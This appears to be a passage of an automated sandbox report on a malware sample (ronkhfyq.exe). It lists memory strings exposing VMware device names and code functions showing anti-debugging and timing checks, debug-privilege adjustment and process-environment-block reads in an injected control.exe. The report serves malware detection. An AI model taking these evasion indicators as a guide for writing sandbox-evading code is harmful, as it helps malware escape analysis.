          Source: explorer.exe, 0000001B.00000003.451527442.0000000009B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000001B.00000003.441522193.0000000009C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\R
          Source: explorer.exe, 0000001B.00000000.484707590.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000\
          Source: explorer.exe, 0000001B.00000003.443497127.0000000009C01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Br
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
          Source: explorer.exe, 00000005.00000000.271012632.00000000051F7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
          Source: explorer.exe, 0000001B.00000000.413259157.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\.dllC
          Source: explorer.exe, 0000001B.00000000.470592589.0000000000A74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}'b
          Source: explorer.exe, 0000001B.00000003.486435704.0000000009B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.Users
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001B.00000003.441522193.0000000009C19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 0000001B.00000003.486435704.0000000009B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001B.00000003.490653470.0000000009CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bdle'
          Source: explorer.exe, 0000001B.00000003.450109036.0000000009B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001B.00000003.451942981.0000000009BEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001B.00000003.486435704.0000000009B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Users
          Source: explorer.exe, 0000001B.00000000.492168075.0000000009CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001B.00000003.491915553.0000000009CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.252434435.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001B.00000003.489338000.0000000009B4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: me#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001B.00000003.452231677.0000000009B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000001B.00000003.491932067.0000000009CD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B6s
          Source: explorer.exe, 0000001B.00000003.452231677.0000000009B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewB
          Source: explorer.exe, 0000001B.00000003.486435704.0000000009B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B}
          Source: explorer.exe, 0000001B.00000003.464937366.0000000009B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563
          Source: explorer.exe, 00000005.00000000.249331621.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00X
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E17AA5 IsDebuggerPresent,1_2_00E17AA5
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E1559A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00E1559A
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E186FE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00E186FE
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 2_2_00408EC0 rdtsc 2_2_00408EC0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFF0BF mov ecx, dword ptr fs:[00000030h]17_2_04BFF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFF0BF mov eax, dword ptr fs:[00000030h]17_2_04BFF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFF0BF mov eax, dword ptr fs:[00000030h]17_2_04BFF0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5B8D0 mov eax, dword ptr fs:[00000030h]17_2_04C5B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5B8D0 mov ecx, dword ptr fs:[00000030h]17_2_04C5B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5B8D0 mov eax, dword ptr fs:[00000030h]17_2_04C5B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5B8D0 mov eax, dword ptr fs:[00000030h]17_2_04C5B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5B8D0 mov eax, dword ptr fs:[00000030h]17_2_04C5B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5B8D0 mov eax, dword ptr fs:[00000030h]17_2_04C5B8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C98CD6 mov eax, dword ptr fs:[00000030h]17_2_04C98CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C814FB mov eax, dword ptr fs:[00000030h]17_2_04C814FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C46CF0 mov eax, dword ptr fs:[00000030h]17_2_04C46CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C46CF0 mov eax, dword ptr fs:[00000030h]17_2_04C46CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C46CF0 mov eax, dword ptr fs:[00000030h]17_2_04C46CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC9080 mov eax, dword ptr fs:[00000030h]17_2_04BC9080
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C43884 mov eax, dword ptr fs:[00000030h]17_2_04C43884
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C43884 mov eax, dword ptr fs:[00000030h]17_2_04C43884
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C090AF mov eax, dword ptr fs:[00000030h]17_2_04C090AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFBC2C mov eax, dword ptr fs:[00000030h]17_2_04BFBC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5C450 mov eax, dword ptr fs:[00000030h]17_2_04C5C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C5C450 mov eax, dword ptr fs:[00000030h]17_2_04C5C450
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDB02A mov eax, dword ptr fs:[00000030h]17_2_04BDB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDB02A mov eax, dword ptr fs:[00000030h]17_2_04BDB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDB02A mov eax, dword ptr fs:[00000030h]17_2_04BDB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BDB02A mov eax, dword ptr fs:[00000030h]17_2_04BDB02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C82073 mov eax, dword ptr fs:[00000030h]17_2_04C82073
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C91074 mov eax, dword ptr fs:[00000030h]17_2_04C91074
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C9740D mov eax, dword ptr fs:[00000030h]17_2_04C9740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C9740D mov eax, dword ptr fs:[00000030h]17_2_04C9740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C9740D mov eax, dword ptr fs:[00000030h]17_2_04C9740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C81C06 mov eax, dword ptr fs:[00000030h]17_2_04C81C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C46C0A mov eax, dword ptr fs:[00000030h]17_2_04C46C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C46C0A mov eax, dword ptr fs:[00000030h]17_2_04C46C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C46C0A mov eax, dword ptr fs:[00000030h]17_2_04C46C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C46C0A mov eax, dword ptr fs:[00000030h]17_2_04C46C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C47016 mov eax, dword ptr fs:[00000030h]17_2_04C47016
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C47016 mov eax, dword ptr fs:[00000030h]17_2_04C47016
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C47016 mov eax, dword ptr fs:[00000030h]17_2_04C47016
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE746D mov eax, dword ptr fs:[00000030h]17_2_04BE746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C94015 mov eax, dword ptr fs:[00000030h]17_2_04C94015
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C94015 mov eax, dword ptr fs:[00000030h]17_2_04C94015
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE0050 mov eax, dword ptr fs:[00000030h]17_2_04BE0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BE0050 mov eax, dword ptr fs:[00000030h]17_2_04BE0050
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF35A1 mov eax, dword ptr fs:[00000030h]17_2_04BF35A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFFD9B mov eax, dword ptr fs:[00000030h]17_2_04BFFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFFD9B mov eax, dword ptr fs:[00000030h]17_2_04BFFD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C78DF1 mov eax, dword ptr fs:[00000030h]17_2_04C78DF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC2D8A mov eax, dword ptr fs:[00000030h]17_2_04BC2D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC2D8A mov eax, dword ptr fs:[00000030h]17_2_04BC2D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC2D8A mov eax, dword ptr fs:[00000030h]17_2_04BC2D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC2D8A mov eax, dword ptr fs:[00000030h]17_2_04BC2D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BC2D8A mov eax, dword ptr fs:[00000030h]17_2_04BC2D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BFA185 mov eax, dword ptr fs:[00000030h]17_2_04BFA185
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BEC182 mov eax, dword ptr fs:[00000030h]17_2_04BEC182
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCB1E1 mov eax, dword ptr fs:[00000030h]17_2_04BCB1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCB1E1 mov eax, dword ptr fs:[00000030h]17_2_04BCB1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BCB1E1 mov eax, dword ptr fs:[00000030h]17_2_04BCB1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C03D43 mov eax, dword ptr fs:[00000030h]17_2_04C03D43
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF4D3B mov eax, dword ptr fs:[00000030h]17_2_04BF4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF4D3B mov eax, dword ptr fs:[00000030h]17_2_04BF4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF4D3B mov eax, dword ptr fs:[00000030h]17_2_04BF4D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04C43540 mov eax, dword ptr fs:[00000030h]17_2_04C43540
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF513A mov eax, dword ptr fs:[00000030h]17_2_04BF513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BF513A mov eax, dword ptr fs:[00000030h]17_2_04BF513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 17_2_04BD3D34 mov eax, dword ptr fs:[00000030h]17_2_04BD3D34
